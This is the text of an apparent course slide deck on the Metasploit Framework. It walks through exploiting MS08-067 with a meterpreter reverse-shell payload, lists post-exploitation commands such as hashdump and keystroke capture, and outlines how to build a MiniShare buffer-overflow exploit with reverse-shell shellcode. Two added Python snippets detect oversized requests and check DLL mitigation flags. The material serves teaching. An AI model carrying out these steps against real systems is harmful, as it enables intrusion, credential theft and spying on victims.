Slide1
Anthony Gabrielson
Adam Helbling
Slide2
Agenda
Part 1:
The Metasploit Framework
Basics
Running Metasploit
The Exploit
Demo
More on Exploits
Part 2:
From ‘ploit’ to ‘ploit’
Overview
Assumptions
Environment Setup
Ollydbg Introduction
Vulnerability Explanation
Crafting the Exploit
Metasploit Enablers
Adding Shellcode
Slide3
The Metasploit Framework:
Basics
Vitals
Created in 2003 by HD Moore
BSD License
700K lines of Ruby
Currently produced by Rapid 7
De facto standard vulnerability development framework
Commercial Alternatives
Rapid 7 has many commercial implementations
Immunity CANVAS
Core Impact
Slide4
The Metasploit Framework:
Basics (cont’d)
Metasploit is a well known anti-forensic and evasion tool
Modular for ease of development and portability
msfupdate
Get the latest & greatest exploits
msfconsole
The console – also works as a command shell
Exploit Automation
db_autopwn
Very noisy
Requires a database
Slide5
The Metasploit Framework:
Running Metasploit
Slide6
The Metasploit Framework:
The Exploit
ms08_067_netapi (RANK: Great)
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module; full support for NX bypass on 2003, along with other platforms, is still in development.
This attack can be prevented with the MS08-067 patch.
Slide7
The Metasploit Framework:
Demo
Slide8
The Metasploit Framework:
Demo Walkthrough
msfconsole
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST [remote host] 192.168.11.51
set LHOST [local host] 192.168.11.53
show options

Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.11.51    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
   LHOST     192.168.11.53    yes       The listen address
   LPORT     4444             yes       The listen port

exploit
Slide9
The Metasploit Framework:
More about the Exploit
msf exploit(ms08_067_netapi) > show targets

Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   …
   61  Windows 2003 SP2 Japanese (NO NX)
Slide10
The Metasploit Framework:
Meterpreter Commands
meterpreter > sysinfo
System Language : en_US
OS : Windows XP (Build 2600, Service Pack 2).
Computer : AGABRIEL-B90B23
Architecture : x86
Meterpreter : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 396 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
More:
hashdump
upload
webcam_snap
keyscan_{start, stop, dump}
ps
Slide11
From ploit to ploit: Overview
…or how to add a generic exploit to your Metasploit arsenal
Q: What can you do with a known vulnerability?
Craft an exploit, execute from a command line
What else?
Metasploit is not perfect, but it has its place.
Repository
Framework
Tools to help build exploits
Ease of use
Generic shellcode vs. robust shellcode
Challenges:
Crafting the exploit
Reuse of an exploit
Slide12
From ploit to ploit: Assumptions
Already spent resources (time, money, etc.) to discover a vulnerability via one (or all) of the following:
Fuzzing
Static disassembly
Review of source code
Known vulnerability
CVE found on http://cve.mitre.org/
Security Advisory (http://secunia.com/advisories)
Known Exploit
Exploit DB (http://www.exploit-db.com/exploits)
Slide13
From ploit to ploit: Environment Setup
Vulnerability: MiniShare HTTP “GET” Request Buffer Overflow Vulnerability
Exploit: MiniShare Remote Buffer Overflow Exploit (C source)
Windows XP SP2 (or really any XP version)
MiniShare 1.4.1
Ollydbg 1.10
Backtrack 4
Metasploit
Python
Netcat
Slide14
From ploit to ploit: Ollydbg Introduction
Main Pane: CPU instructions (Microsoft Assembler format)
Memory Pane: Current section of memory where the code is executing
Registers Pane:
EIP: Address of the next instruction to be executed
ESP: Stack pointer
Stack Pane: Shows the entries on the stack
Slide15
From ploit to ploit: Vulnerability Explanation
HTTP GET with a large (>1787 bytes) request
GET [a string of >1787 bytes] HTTP/1.1\r\n\r\n
EIP = 0x41414141
Access violation when reading [41414141]
EIP points to the address containing the next instruction, but 0x41414141 throws an access violation.
ESP = the address of the buffer that was overflowed.
Note the “AAAAAAAAAAAAAAAAAA……AAAA”
Slide16
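As an added example (not part of the slides), a small Python check a defender could run over captured requests to the MiniShare service: it flags a request line longer than the 1787-byte threshold described on this slide and long runs of a single repeated byte in the request target (the “AAAA…” filler). The two sample requests are constructed for the example.

```python
import re

# Threshold from the slide: EIP is overwritten once the GET request exceeds 1787 bytes.
MAX_REQUEST_LINE = 1787
# A long run of one repeated byte in the URL is typical filler ('AAAA...') rather than a real path.
MAX_REPEATED_RUN = 64

def longest_repeated_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte in data (0 for empty input)."""
    return max((len(m.group(0)) for m in re.finditer(rb"(.)\1*", data, re.DOTALL)), default=0)

def inspect_request(raw: bytes) -> dict:
    """Inspect one raw HTTP request (request line + headers) and return findings."""
    request_line = raw.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ")
    method = parts[0].decode("ascii", "replace") if parts else ""
    target = parts[1] if len(parts) > 1 else b""
    run = longest_repeated_run(target)
    return {
        "method": method,
        "request_line_len": len(request_line),
        "oversized": len(request_line) > MAX_REQUEST_LINE,
        "longest_repeated_run": run,
        "suspicious": len(request_line) > MAX_REQUEST_LINE or run >= MAX_REPEATED_RUN,
    }

def flag_requests(requests) -> list:
    """Return the findings for every request that looks like an overflow attempt."""
    return [r for r in (inspect_request(q) for q in requests) if r["suspicious"]]

# Constructed sample traffic: one ordinary request and one shaped like the crash case above.
NORMAL_GET = b"GET /index.html HTTP/1.1\r\nHost: fileserver\r\n\r\n"
CRASH_GET = b"GET /" + b"A" * 1800 + b" HTTP/1.1\r\n\r\n"

if __name__ == "__main__":
    for finding in flag_requests([NORMAL_GET, CRASH_GET]):
        print(finding)
```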
From ploit to ploit: Crafting the Exploit
This approach is different from the lab exercise assigned.
We are not overwriting the stack’s return address here.
Instead, let’s find an instruction in the code to transfer our execution to:
\xFF\xE4 = JMP ESP – Jump to the address stored in ESP.
Overwrite EIP with the address of a JMP ESP instruction.
More robust to some degree because we will pick an address that is predictable and will work across more systems.
In Win XP SP2 there is no randomization of the base location where DLLs are loaded, therefore if we choose a DLL it will work on each system that loads this DLL.
The best choice would be a DLL provided with MiniShare; however, there are none, so we revert to using a Windows DLL.
Slide17
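Added example (not from the slides): a Python check of the PE optional header’s DllCharacteristics field, which is how a defender tells whether a module opts into ASLR (DYNAMIC_BASE) and DEP (NX_COMPAT), i.e. whether it would load at the fixed base that the slide relies on for XP SP2. The flag values and header offsets are from the PE/COFF specification; make_stub_pe builds a constructed header only so the check can be exercised offline.

```python
import struct

# IMAGE_DLLCHARACTERISTICS bits from the PE/COFF specification.
DYNAMIC_BASE = 0x0040  # image may be relocated at load time (ASLR opt-in)
NX_COMPAT = 0x0100     # image is DEP/NX compatible

def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics field of a PE image; raises ValueError if not PE."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20  # skip the signature and the 20-byte COFF file header
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 of the optional header in both PE32 and PE32+.
    (chars,) = struct.unpack_from("<H", image, opt + 70)
    return chars

def dll_report(image: bytes) -> dict:
    """Summarise the mitigations a module opts into."""
    chars = dll_characteristics(image)
    return {
        "dynamic_base": bool(chars & DYNAMIC_BASE),
        "nx_compat": bool(chars & NX_COMPAT),
        # Without DYNAMIC_BASE the loader prefers the linker's ImageBase, so every
        # address inside the module is the same on every machine that loads it.
        "fixed_load_address": not (chars & DYNAMIC_BASE),
    }

def make_stub_pe(dll_chars: int) -> bytes:
    """Constructed minimal PE32 header for testing (not a loadable image)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    # COFF header: i386, no sections, 224-byte optional header, EXECUTABLE|32BIT|DLL
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)  # DllCharacteristics
    return dos + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:  # pass the path of a DLL to inspect
        print(dll_report(f.read()))
```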
From ploit to ploit: Metasploit Enablers
/pentest/exploits/framework3/tools/pattern_create.rb
Creates a unique pattern of a user-specified length.
Useful for understanding the offsets within the buffer where we overwrite.
/pentest/exploits/framework3/tools/pattern_offset.rb
Returns the location where EIP is overwritten and where ESP points to.
Finds offsets using the pattern generated by pattern_create.rb
EIP overwritten at 1787 bytes into our buffer
ESP points to location 1791 bytes into our buffer
Slide18
From ploit to ploit: Adding Shellcode
Using msfpayload, which comes with Metasploit, we will create a useful piece of shellcode which creates a reverse shell on a port.
What is a reverse shell?
Note: Does this give us away?!
C style vs. raw output (‘R’ vs. ‘C’)
Does anyone see a problem with some of this shellcode?
msfencode can help us…
Let’s add some NOPs to help improve stability.
Now all that would need to be done is to add this to Metasploit as a Ruby script. (Note: It’s already in there)
Slide19
References and Conclusions
http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
http://www.offensive-security.com/metasploit-unleashed/
Metasploitable
This presentation just begins to scratch the surface
Questions?
Slide20
The Metasploit Framework:
The Exploit (2)
psexec
Light-weight telnet replacement that lets you execute processes on other systems
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
This one has more, list ‘em
Slide21
The Exploit (3)
ms05_039_pnp
Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege
This module exploits a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the services.exe process, a failed exploit attempt will cause the system to automatically reboot.
Affected Systems: Win2k SP4, Win XP SP2, etc…